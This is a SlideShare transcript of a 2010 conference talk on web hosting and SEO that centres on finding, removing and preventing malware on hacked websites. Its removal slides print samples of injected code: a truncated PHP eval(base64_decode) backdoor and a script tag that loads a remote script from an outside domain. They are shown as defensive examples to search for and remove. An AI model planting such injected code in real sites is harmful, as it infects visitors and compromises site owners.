SlideShare uma empresa Scribd logo

2010 11 pubcon_hendison-hosting

Transferir como PPT, PDF
S
shendison

Scott Hendisons Pubcon 2010 presentation on web hosting and SEO

TecnologiaDesign
1 de 34
Hosting & SEO Scott Hendison Search Commander, Inc. SEO Automatic
About Scott Hendison • Began “hosting“ websites in 1997 with one server in our retail computer store, with standard DSL • Grew to 11 servers then switched to a sort of “datacenter co-op“ a few years ago, all in the same local facility in Gresham Oregon. • Not our primary business, but we still host over 1000 domains today, as well as maintain end-user hosting accounts on several major hosts.
Web Hosting and SEO • I've been on this panel three times and discussed – – shared vs. dedicated servers – Static vs. shared IP addresses – Apache 1 vs Apache 2 – Apache vs. Windows – .htaccess – mod_rewrite – Windows IIS rewriting options – Server speed and performance – and other riveting subjects trying to better relate to SEO
Web Hosting and SEO Speed and Performance • I “predicted” at Pubcon 2009 that speed will soon matter for organic, then Matt Cutts announced next day • Not a risky prediction, considering Adwords Quality Scores • Speed as ranking factor began “counting” April 9, 2010 • Google has two great tools – Page Speed for Firefox – (download inside Webmaster Tools) – Google Chrome (right click in Chrome and “inspect element”)
But I‘m Not Talking About Speed • Far more important • The #1 killer of websites • The thing that drives visitors away in droves • Drains PPC money as fast as possible • Google stops people from even arriving at your site! • I’m talking about…
Malware
Malware • Nothing can fully protect users from getting viruses • Viruses can steal the BEST passwords & logins • If you don’t get one, contractors, employees or family probably will, infecting your network. • People should use index cards and a fireproof safe • But that’s pretty unrealistic, so learn to deal with disasters
Malware identification • Nearly 15% of “our” sites were hacked in 2010 • Most were self inflicted through laziness and stupidity • The hacks really didn’t vary all that much • Getting rid of hacks can be a headache • Getting back into Google isn’t very difficult • Protecting yourself FROM hacks is getting easier, but… • Sadly, the hacking keeps getting easier…
Malware • Identification • Removal • Prevention
Identification • You can get notified by a client or customer • You discover it in a browser or AV warning • You can see your site flagged in the SERPS • You can get notified by Google WMT – (sometimes)
Malware Warnings
Warnings in the SERPS!
Interstitial Page
#1 Conversion Killer • Nothing hurts you more than if people wont come to your site in the first place. • Once you‘ve identified a problem, what can you do? – Clean up the offending code – Beg Google for a clean bill of health
Removal • Most hacks we saw were pretty similar • Cross Site Scripting (XSS) and SQL Injection • Adding links and adding hosted scripts • Hackers want to add links to your site • Hackers want to add scripts to infect users with viruses which in turn, steal more passwords • Not too technical - Look for strange javascripts!
Removal
Removal
Removal • If WMT is no help, then look at files manually • Use backups and file comparison tools • Check recent change dates • Look for things that don‘t belong, often in pages named index, home, and default - in .php and .html extensions • Look in headers and footers too
Removal <?php eval(base64_decode('aWYoIWlzc2V0KCRtNzc5djEp KXtmdW5jdGlvbiBtNzc5digkcyl7aWYocHJlZ19tY <snip> XRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjJ203 Nzl2MicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlK CRfUE9TVFsnZSddKSk7')); ?> (<snipped> goes on for dozens of lines )
Removal • Usually index, home, header and footer – <script src=http://domainX.ac.jp/course/VIVID.php ></script> • And in most or all javascript files - document.write('<script src=http://domainX.ac.jp/course/VIVID.php ></script>');"
Removal • Not all that complicated, just tedious. • Search files for <script src=http:// and make sure you recognize them all, and search for eval(base64 too. • Overly simplistic to say “clean it up“ but others have likely had your same problem. • Google for it w/ quotes to find YOUR exact code. • Get a quick look at your site w/ free tool at http://UnmaskParasites.com
Once You‘re Clean
Once You‘re Clean Write something like this – Thank you for identifying our malware problem, and we believe all is now cleaned up. We have verified that we're clean using an online scanner - http://www.unmaskparasites.com - and would appreciate a speedy resolution. Thank you, Scott Hendison
Once You‘re Clean • Document your process and improve it • Get ready to have it happen again • Begin to protect yourself – Get paranoid.
Prevention • FTP Passwords – Don't share FTP access – make new users instead. – NEVER use a dictionary word in the password – Use at least 8 characters (some people will say 20+) – Mix Upper Case, Lower Case, numerals and symbols – CHANGE passwords without telling your dev people every few months. • Stop using plain old FTP - WinSCP is free SFTP
Prevention • Using a CMS? • Find the documentation on locking it down • Do ALL system updates • Do ALL released security patches • Routine maintenance (just like WMT & Analytics) • More popular = more vulnerable, like WordPress
Prevention • Nearly 8% of all sites are now WordPress* • We work in Wordpress 95% of the time • Same thing that makes it great makes it riskier • Amazing plugins have been developed for safety • Common threats have easy solutions * Supposedly said my Matt Mullenweg at one of the 2010 WordCamp, but I can‘t prove it.
Prevention
Prevention
Prevention
Prevention
Prevention • Total prevention may be impossible. Be prepared! • Backup restoration sometimes faster than repair • Hosts can may keep backups 7 days, or even less! • Get weekly (or daily) backups in place & off-host • Store a year of monthly backups at AWS • Document the entire restore process and TEST • Your site hack is generally not the webhosts fault!
Take-aways • FAR more important than your SEO • Dig into Webmaster Tools malware area • Change all FTP Passwords asap, & consider SFTP • Check for updated versions on forms, and on your CMS • Get backup and restore processes in place NOW
Thank You WordPress Lunch Table Thursday 1:30 Scott Hendison Search Commander, Inc. shendison@seoautomatic.com

Recomendados

2010 11 pubcon_hendison_wordpress
2010 11 pubcon_hendison_wordpress2010 11 pubcon_hendison_wordpress
2010 11 pubcon_hendison_wordpressshendison
 
Installing WordPress The Right Way
Installing WordPress The Right WayInstalling WordPress The Right Way
Installing WordPress The Right WayChris Burgess
 
WordPress Plugins and Security
WordPress Plugins and SecurityWordPress Plugins and Security
WordPress Plugins and SecurityThink Media Inc.
 
WordPress Security 101 - Meetup Nairobi March 2020
WordPress Security 101 - Meetup Nairobi March 2020 WordPress Security 101 - Meetup Nairobi March 2020
WordPress Security 101 - Meetup Nairobi March 2020 stk_jj
 
Blog World 2010 - How to Keep Your Blog from Being Hacked
Blog World 2010 - How to Keep Your Blog from Being HackedBlog World 2010 - How to Keep Your Blog from Being Hacked
Blog World 2010 - How to Keep Your Blog from Being HackedBrian Layman
 
Let’s write a plugin
Let’s write a pluginLet’s write a plugin
Let’s write a pluginBrian Layman
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Brian Layman
 
Word press development for non developers
Word press development for non developers Word press development for non developers
Word press development for non developers Jessica C. Gardner
 

Recomendados

2010 11 pubcon_hendison_wordpress
2010 11 pubcon_hendison_wordpress2010 11 pubcon_hendison_wordpress
2010 11 pubcon_hendison_wordpressshendison
 
Installing WordPress The Right Way
Installing WordPress The Right WayInstalling WordPress The Right Way
Installing WordPress The Right WayChris Burgess
 
WordPress Plugins and Security
WordPress Plugins and SecurityWordPress Plugins and Security
WordPress Plugins and SecurityThink Media Inc.
 
WordPress Security 101 - Meetup Nairobi March 2020
WordPress Security 101 - Meetup Nairobi March 2020 WordPress Security 101 - Meetup Nairobi March 2020
WordPress Security 101 - Meetup Nairobi March 2020 stk_jj
 
Blog World 2010 - How to Keep Your Blog from Being Hacked
Blog World 2010 - How to Keep Your Blog from Being HackedBlog World 2010 - How to Keep Your Blog from Being Hacked
Blog World 2010 - How to Keep Your Blog from Being HackedBrian Layman
 
Let’s write a plugin
Let’s write a pluginLet’s write a plugin
Let’s write a pluginBrian Layman
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Brian Layman
 
Word press development for non developers
Word press development for non developers Word press development for non developers
Word press development for non developers Jessica C. Gardner
 
What Multisite can do for You - Anthony Cole - WordCamp Sydney 2012
What Multisite can do for You - Anthony Cole - WordCamp Sydney 2012What Multisite can do for You - Anthony Cole - WordCamp Sydney 2012
What Multisite can do for You - Anthony Cole - WordCamp Sydney 2012WordCamp Sydney
 
How to create a WordPress Site
How to create a WordPress Site How to create a WordPress Site
How to create a WordPress Site MuhammadUsaid2
 
Get Involved with WordPress
Get Involved with WordPressGet Involved with WordPress
Get Involved with WordPressMario Peshev
 
Speed up Your Joomla Site for Ultimate Performance
Speed up Your Joomla Site for Ultimate PerformanceSpeed up Your Joomla Site for Ultimate Performance
Speed up Your Joomla Site for Ultimate PerformanceJoomlaDay Australia
 
WordPress Workshop
WordPress WorkshopWordPress Workshop
WordPress WorkshopTerri Orlowski
 
Squeeze Maximum Performance From Your Joomla Website
Squeeze Maximum Performance From Your Joomla WebsiteSqueeze Maximum Performance From Your Joomla Website
Squeeze Maximum Performance From Your Joomla WebsiteSiteGround.com
 
"Turbo boost your website" aka BigPipe at Webinale 2014 in Berlin
"Turbo boost your website" aka BigPipe at Webinale 2014 in Berlin"Turbo boost your website" aka BigPipe at Webinale 2014 in Berlin
"Turbo boost your website" aka BigPipe at Webinale 2014 in BerlinTobias Zander
 
Word press workshop powerpoint
Word press workshop powerpointWord press workshop powerpoint
Word press workshop powerpointerezwe
 
WordPress Security 101 - WordCamp Nairobi 2019
WordPress Security 101 - WordCamp Nairobi 2019WordPress Security 101 - WordCamp Nairobi 2019
WordPress Security 101 - WordCamp Nairobi 2019stk_jj
 
Isomorphic WordPress Applications with NodeifyWP
Isomorphic WordPress Applications with NodeifyWPIsomorphic WordPress Applications with NodeifyWP
Isomorphic WordPress Applications with NodeifyWPTaylor Lovett
 
WordPress Theme Reviewers Team
WordPress Theme Reviewers TeamWordPress Theme Reviewers Team
WordPress Theme Reviewers TeamMario Peshev
 
HTML5shim
HTML5shimHTML5shim
HTML5shimMichael MacDonald
 
Building the basics (WordPress Ottawa 2014)
Building the basics (WordPress Ottawa 2014)Building the basics (WordPress Ottawa 2014)
Building the basics (WordPress Ottawa 2014)christopherfross
 
My Website Can Vote - The Challenges of Maintaining a 20-year-old Website
My Website Can Vote - The Challenges of Maintaining a 20-year-old WebsiteMy Website Can Vote - The Challenges of Maintaining a 20-year-old Website
My Website Can Vote - The Challenges of Maintaining a 20-year-old WebsiteKristine Howard
 
Head Slapping WordPress Security
Head Slapping WordPress SecurityHead Slapping WordPress Security
Head Slapping WordPress SecurityChris Burgess
 
WordPress Meetup Bandung - December 2014
WordPress Meetup Bandung - December 2014WordPress Meetup Bandung - December 2014
WordPress Meetup Bandung - December 2014Fikri Rasyid
 
WordPress Security
WordPress SecurityWordPress Security
WordPress SecurityNathan Platt
 
Theming in WordPress - Where do I Start?
Theming in WordPress - Where do I Start?Theming in WordPress - Where do I Start?
Theming in WordPress - Where do I Start?Edmund Turbin
 
DNN Summit: Robots.txt & Multi-Site DNN Instances
DNN Summit: Robots.txt & Multi-Site DNN InstancesDNN Summit: Robots.txt & Multi-Site DNN Instances
DNN Summit: Robots.txt & Multi-Site DNN InstancesWill Strohl
 
NEPA BlogCon 2013 - WordPress Customization & Security
NEPA BlogCon 2013 - WordPress Customization & SecurityNEPA BlogCon 2013 - WordPress Customization & Security
NEPA BlogCon 2013 - WordPress Customization & SecurityMichelle Davies (Hryvnak)
 
Effective approaches to web application security
Effective approaches to web application security Effective approaches to web application security
Effective approaches to web application security Zane Lackey
 
System hardening - OS and Application
System hardening - OS and ApplicationSystem hardening - OS and Application
System hardening - OS and Applicationedavid2685
 

Mais conteúdo relacionado

Mais procurados

What Multisite can do for You - Anthony Cole - WordCamp Sydney 2012
What Multisite can do for You - Anthony Cole - WordCamp Sydney 2012What Multisite can do for You - Anthony Cole - WordCamp Sydney 2012
What Multisite can do for You - Anthony Cole - WordCamp Sydney 2012WordCamp Sydney
 
How to create a WordPress Site
How to create a WordPress Site How to create a WordPress Site
How to create a WordPress Site MuhammadUsaid2
 
Get Involved with WordPress
Get Involved with WordPressGet Involved with WordPress
Get Involved with WordPressMario Peshev
 
Speed up Your Joomla Site for Ultimate Performance
Speed up Your Joomla Site for Ultimate PerformanceSpeed up Your Joomla Site for Ultimate Performance
Speed up Your Joomla Site for Ultimate PerformanceJoomlaDay Australia
 
Squeeze Maximum Performance From Your Joomla Website
Squeeze Maximum Performance From Your Joomla WebsiteSqueeze Maximum Performance From Your Joomla Website
Squeeze Maximum Performance From Your Joomla WebsiteSiteGround.com
 
"Turbo boost your website" aka BigPipe at Webinale 2014 in Berlin
"Turbo boost your website" aka BigPipe at Webinale 2014 in Berlin"Turbo boost your website" aka BigPipe at Webinale 2014 in Berlin
"Turbo boost your website" aka BigPipe at Webinale 2014 in BerlinTobias Zander
 
Word press workshop powerpoint
Word press workshop powerpointWord press workshop powerpoint
Word press workshop powerpointerezwe
 
WordPress Security 101 - WordCamp Nairobi 2019
WordPress Security 101 - WordCamp Nairobi 2019WordPress Security 101 - WordCamp Nairobi 2019
WordPress Security 101 - WordCamp Nairobi 2019stk_jj
 
Isomorphic WordPress Applications with NodeifyWP
Isomorphic WordPress Applications with NodeifyWPIsomorphic WordPress Applications with NodeifyWP
Isomorphic WordPress Applications with NodeifyWPTaylor Lovett
 
WordPress Theme Reviewers Team
WordPress Theme Reviewers TeamWordPress Theme Reviewers Team
WordPress Theme Reviewers TeamMario Peshev
 
Building the basics (WordPress Ottawa 2014)
Building the basics (WordPress Ottawa 2014)Building the basics (WordPress Ottawa 2014)
Building the basics (WordPress Ottawa 2014)christopherfross
 
My Website Can Vote - The Challenges of Maintaining a 20-year-old Website
My Website Can Vote - The Challenges of Maintaining a 20-year-old WebsiteMy Website Can Vote - The Challenges of Maintaining a 20-year-old Website
My Website Can Vote - The Challenges of Maintaining a 20-year-old WebsiteKristine Howard
 
Head Slapping WordPress Security
Head Slapping WordPress SecurityHead Slapping WordPress Security
Head Slapping WordPress SecurityChris Burgess
 
WordPress Meetup Bandung - December 2014
WordPress Meetup Bandung - December 2014WordPress Meetup Bandung - December 2014
WordPress Meetup Bandung - December 2014Fikri Rasyid
 
WordPress Security
WordPress SecurityWordPress Security
WordPress SecurityNathan Platt
 
Theming in WordPress - Where do I Start?
Theming in WordPress - Where do I Start?Theming in WordPress - Where do I Start?
Theming in WordPress - Where do I Start?Edmund Turbin
 
DNN Summit: Robots.txt & Multi-Site DNN Instances
DNN Summit: Robots.txt & Multi-Site DNN InstancesDNN Summit: Robots.txt & Multi-Site DNN Instances
DNN Summit: Robots.txt & Multi-Site DNN InstancesWill Strohl
 
NEPA BlogCon 2013 - WordPress Customization & Security
NEPA BlogCon 2013 - WordPress Customization & SecurityNEPA BlogCon 2013 - WordPress Customization & Security
NEPA BlogCon 2013 - WordPress Customization & SecurityMichelle Davies (Hryvnak)
 

Mais procurados (20)

What Multisite can do for You - Anthony Cole - WordCamp Sydney 2012
What Multisite can do for You - Anthony Cole - WordCamp Sydney 2012What Multisite can do for You - Anthony Cole - WordCamp Sydney 2012
What Multisite can do for You - Anthony Cole - WordCamp Sydney 2012
 
How to create a WordPress Site
How to create a WordPress Site How to create a WordPress Site
How to create a WordPress Site
 
Get Involved with WordPress
Get Involved with WordPressGet Involved with WordPress
Get Involved with WordPress
 
Speed up Your Joomla Site for Ultimate Performance
Speed up Your Joomla Site for Ultimate PerformanceSpeed up Your Joomla Site for Ultimate Performance
Speed up Your Joomla Site for Ultimate Performance
 
WordPress Workshop
WordPress WorkshopWordPress Workshop
WordPress Workshop
 
Squeeze Maximum Performance From Your Joomla Website
Squeeze Maximum Performance From Your Joomla WebsiteSqueeze Maximum Performance From Your Joomla Website
Squeeze Maximum Performance From Your Joomla Website
 
"Turbo boost your website" aka BigPipe at Webinale 2014 in Berlin
"Turbo boost your website" aka BigPipe at Webinale 2014 in Berlin"Turbo boost your website" aka BigPipe at Webinale 2014 in Berlin
"Turbo boost your website" aka BigPipe at Webinale 2014 in Berlin
 
Word press workshop powerpoint
Word press workshop powerpointWord press workshop powerpoint
Word press workshop powerpoint
 
WordPress Security 101 - WordCamp Nairobi 2019
WordPress Security 101 - WordCamp Nairobi 2019WordPress Security 101 - WordCamp Nairobi 2019
WordPress Security 101 - WordCamp Nairobi 2019
 
Isomorphic WordPress Applications with NodeifyWP
Isomorphic WordPress Applications with NodeifyWPIsomorphic WordPress Applications with NodeifyWP
Isomorphic WordPress Applications with NodeifyWP
 
WordPress Theme Reviewers Team
WordPress Theme Reviewers TeamWordPress Theme Reviewers Team
WordPress Theme Reviewers Team
 
HTML5shim
HTML5shimHTML5shim
HTML5shim
 
Building the basics (WordPress Ottawa 2014)
Building the basics (WordPress Ottawa 2014)Building the basics (WordPress Ottawa 2014)
Building the basics (WordPress Ottawa 2014)
 
My Website Can Vote - The Challenges of Maintaining a 20-year-old Website
My Website Can Vote - The Challenges of Maintaining a 20-year-old WebsiteMy Website Can Vote - The Challenges of Maintaining a 20-year-old Website
My Website Can Vote - The Challenges of Maintaining a 20-year-old Website
 
Head Slapping WordPress Security
Head Slapping WordPress SecurityHead Slapping WordPress Security
Head Slapping WordPress Security
 
WordPress Meetup Bandung - December 2014
WordPress Meetup Bandung - December 2014WordPress Meetup Bandung - December 2014
WordPress Meetup Bandung - December 2014
 
WordPress Security
WordPress SecurityWordPress Security
WordPress Security
 
Theming in WordPress - Where do I Start?
Theming in WordPress - Where do I Start?Theming in WordPress - Where do I Start?
Theming in WordPress - Where do I Start?
 
DNN Summit: Robots.txt & Multi-Site DNN Instances
DNN Summit: Robots.txt & Multi-Site DNN InstancesDNN Summit: Robots.txt & Multi-Site DNN Instances
DNN Summit: Robots.txt & Multi-Site DNN Instances
 
NEPA BlogCon 2013 - WordPress Customization & Security
NEPA BlogCon 2013 - WordPress Customization & SecurityNEPA BlogCon 2013 - WordPress Customization & Security
NEPA BlogCon 2013 - WordPress Customization & Security
 

Semelhante a 2010 11 pubcon_hendison-hosting

Effective approaches to web application security
Effective approaches to web application security Effective approaches to web application security
Effective approaches to web application security Zane Lackey
 
System hardening - OS and Application
System hardening - OS and ApplicationSystem hardening - OS and Application
System hardening - OS and Applicationedavid2685
 
Info sec is not daunting v1.0
Info sec is not daunting v1.0 Info sec is not daunting v1.0
Info sec is not daunting v1.0 Michael Gough
 
Care and feeding of your website
Care and feeding of your websiteCare and feeding of your website
Care and feeding of your websiteShawn DeWolfe
 
WebHosting Performance / WordPress - Pubcon Vegas - Hendison
WebHosting Performance / WordPress - Pubcon Vegas - HendisonWebHosting Performance / WordPress - Pubcon Vegas - Hendison
WebHosting Performance / WordPress - Pubcon Vegas - HendisonSearch Commander, Inc.
 
Best Practices for WordPress in Enterprise
Best Practices for WordPress in EnterpriseBest Practices for WordPress in Enterprise
Best Practices for WordPress in EnterpriseTaylor Lovett
 
Django production
Django productionDjango production
Django productionpythonsd
 
How to secure your web applications with NGINX
How to secure your web applications with NGINXHow to secure your web applications with NGINX
How to secure your web applications with NGINXWallarm
 
Life as an enterprise security geek from underground. (What enterprises want ...
Life as an enterprise security geek from underground. (What enterprises want ...Life as an enterprise security geek from underground. (What enterprises want ...
Life as an enterprise security geek from underground. (What enterprises want ...LINE Corporation
 
Best practices-wordpress-enterprise
Best practices-wordpress-enterpriseBest practices-wordpress-enterprise
Best practices-wordpress-enterpriseTaylor Lovett
 
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) HackableCollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) HackableDarren Duke
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The EnterpriseJason Ross
 
ExpressionEngine - Simple Steps to Performance and Security (EECI 2014)
ExpressionEngine - Simple Steps to Performance and Security (EECI 2014)ExpressionEngine - Simple Steps to Performance and Security (EECI 2014)
ExpressionEngine - Simple Steps to Performance and Security (EECI 2014)Nexcess.net LLC
 
Best Practices for Building WordPress Applications
Best Practices for Building WordPress ApplicationsBest Practices for Building WordPress Applications
Best Practices for Building WordPress ApplicationsTaylor Lovett
 
What is Nginx and Why You Should to Use it with Wordpress Hosting
What is Nginx and Why You Should to Use it with Wordpress HostingWhat is Nginx and Why You Should to Use it with Wordpress Hosting
What is Nginx and Why You Should to Use it with Wordpress HostingWPSFO Meetup Group
 
MagentoLive Australia 2014 - The Importance of Performance & Security and Sim...
MagentoLive Australia 2014 - The Importance of Performance & Security and Sim...MagentoLive Australia 2014 - The Importance of Performance & Security and Sim...
MagentoLive Australia 2014 - The Importance of Performance & Security and Sim...Nexcess.net LLC
 
Are you ready to be hacked?
Are you ready to be hacked?Are you ready to be hacked?
Are you ready to be hacked?Daniel Kanchev
 

Semelhante a 2010 11 pubcon_hendison-hosting (20)

Effective approaches to web application security
Effective approaches to web application security Effective approaches to web application security
Effective approaches to web application security
 
System hardening - OS and Application
System hardening - OS and ApplicationSystem hardening - OS and Application
System hardening - OS and Application
 
Info sec is not daunting v1.0
Info sec is not daunting v1.0 Info sec is not daunting v1.0
Info sec is not daunting v1.0
 
Dev Ops without the Ops
Dev Ops without the OpsDev Ops without the Ops
Dev Ops without the Ops
 
Care and feeding of your website
Care and feeding of your websiteCare and feeding of your website
Care and feeding of your website
 
WebHosting Performance / WordPress - Pubcon Vegas - Hendison
WebHosting Performance / WordPress - Pubcon Vegas - HendisonWebHosting Performance / WordPress - Pubcon Vegas - Hendison
WebHosting Performance / WordPress - Pubcon Vegas - Hendison
 
Best Practices for WordPress in Enterprise
Best Practices for WordPress in EnterpriseBest Practices for WordPress in Enterprise
Best Practices for WordPress in Enterprise
 
Django production
Django productionDjango production
Django production
 
How to secure your web applications with NGINX
How to secure your web applications with NGINXHow to secure your web applications with NGINX
How to secure your web applications with NGINX
 
Confidence web
Confidence webConfidence web
Confidence web
 
Life as an enterprise security geek from underground. (What enterprises want ...
Life as an enterprise security geek from underground. (What enterprises want ...Life as an enterprise security geek from underground. (What enterprises want ...
Life as an enterprise security geek from underground. (What enterprises want ...
 
Best practices-wordpress-enterprise
Best practices-wordpress-enterpriseBest practices-wordpress-enterprise
Best practices-wordpress-enterprise
 
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) HackableCollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
ExpressionEngine - Simple Steps to Performance and Security (EECI 2014)
ExpressionEngine - Simple Steps to Performance and Security (EECI 2014)ExpressionEngine - Simple Steps to Performance and Security (EECI 2014)
ExpressionEngine - Simple Steps to Performance and Security (EECI 2014)
 
Best Practices for Building WordPress Applications
Best Practices for Building WordPress ApplicationsBest Practices for Building WordPress Applications
Best Practices for Building WordPress Applications
 
What is Nginx and Why You Should to Use it with Wordpress Hosting
What is Nginx and Why You Should to Use it with Wordpress HostingWhat is Nginx and Why You Should to Use it with Wordpress Hosting
What is Nginx and Why You Should to Use it with Wordpress Hosting
 
MagentoLive Australia 2014 - The Importance of Performance & Security and Sim...
MagentoLive Australia 2014 - The Importance of Performance & Security and Sim...MagentoLive Australia 2014 - The Importance of Performance & Security and Sim...
MagentoLive Australia 2014 - The Importance of Performance & Security and Sim...
 
Adminblast 2013
Adminblast 2013Adminblast 2013
Adminblast 2013
 
Are you ready to be hacked?
Are you ready to be hacked?Are you ready to be hacked?
Are you ready to be hacked?
 

Último

Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 

Último (20)

Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
